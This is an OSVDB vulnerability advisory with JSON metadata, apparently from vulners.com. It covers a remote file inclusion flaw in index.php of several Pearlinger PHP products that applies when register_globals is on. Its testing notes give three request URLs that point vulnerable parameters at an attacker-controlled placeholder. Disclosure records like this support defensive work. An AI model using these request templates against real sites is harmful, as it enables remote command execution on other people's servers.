ID OSVDB:27179 Type osvdb Reporter zero(xzerox@linuxmail.org) Modified 2006-07-02T07:04:08
Description
Vulnerability Description
Pearlinger Multiple Products contain a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the index.php script not properly sanitizing user input supplied to the 'Document[languagePreference]', 'includesDirectory' and 'templatesDirectory' variables. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.
Technical Description
This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).
Solution Description
Currently, there are no known upgrades, patches, or workarounds available to correct this issue.
Short Description
Pearlinger Multiple Products contain a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the index.php script not properly sanitizing user input supplied to the 'Document[languagePreference]', 'includesDirectory' and 'templatesDirectory' variables. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.
{"enchantments": {"score": {"value": 0.9, "vector": "NONE", "modified": "2017-04-28T13:20:23", "rev": 2}, "dependencies": {"references": [], "modified": "2017-04-28T13:20:23", "rev": 2}, "vulnersScore": 0.9}, "bulletinFamily": "software", "affectedSoftware": [{"name": "Pearl For Mambo", "operator": "eq", "version": "1.6"}, {"name": "Pearl For Biz", "operator": "eq", "version": "2.4"}, {"name": "Ngoc Biec", "operator": "eq", "version": "1.4"}, {"name": "Pearl Forums", "operator": "eq", "version": "2.4"}], "references": [], "href": "https://vulners.com/osvdb/OSVDB:27179", "id": "OSVDB:27179", "title": "Pearlinger Multiple Product index.php Multiple Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 0.0, "vector": "NONE"}, "lastseen": "2017-04-28T13:20:23", "edition": 1, "reporter": "zero(xzerox@linuxmail.org)", "description": "## Vulnerability Description\nPearlinger Multiple Products contain a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the index.php script not properly sanitizing user input supplied to the 'Document[languagePreference]', 'includesDirectory' and 'templatesDirectory' variables. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nPearlinger Multiple Products contain a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the index.php script not properly sanitizing user input supplied to the 'Document[languagePreference]', 'includesDirectory' and 'templatesDirectory' variables. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/index.php?Document[languagePreference]=[attacker]\nhttp://[target]/index.php?includesDirectory=[attacker]\nhttp://[target]/index.php?templatesDirectory=[attacker]\n## References:\nVendor URL: http://pearlforums.sourceforge.net/\n[Secunia Advisory ID:20819](https://secuniaresearch.flexerasoftware.com/advisories/20819/)\n[Related OSVDB ID: 27180](https://vulners.com/osvdb/OSVDB:27180)\n[Related OSVDB ID: 27181](https://vulners.com/osvdb/OSVDB:27181)\n[Related OSVDB ID: 27182](https://vulners.com/osvdb/OSVDB:27182)\n[Related OSVDB ID: 27184](https://vulners.com/osvdb/OSVDB:27184)\n[Related OSVDB ID: 27185](https://vulners.com/osvdb/OSVDB:27185)\n[Related OSVDB ID: 27190](https://vulners.com/osvdb/OSVDB:27190)\n[Related OSVDB ID: 27212](https://vulners.com/osvdb/OSVDB:27212)\n[Related OSVDB ID: 27188](https://vulners.com/osvdb/OSVDB:27188)\n[Related OSVDB ID: 27189](https://vulners.com/osvdb/OSVDB:27189)\n[Related OSVDB ID: 27191](https://vulners.com/osvdb/OSVDB:27191)\n[Related OSVDB ID: 27186](https://vulners.com/osvdb/OSVDB:27186)\n[Related OSVDB ID: 27187](https://vulners.com/osvdb/OSVDB:27187)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-07/0026.html\n", "modified": "2006-07-02T07:04:08", "viewCount": 0, "published": "2006-07-02T07:04:08", "cvelist": []}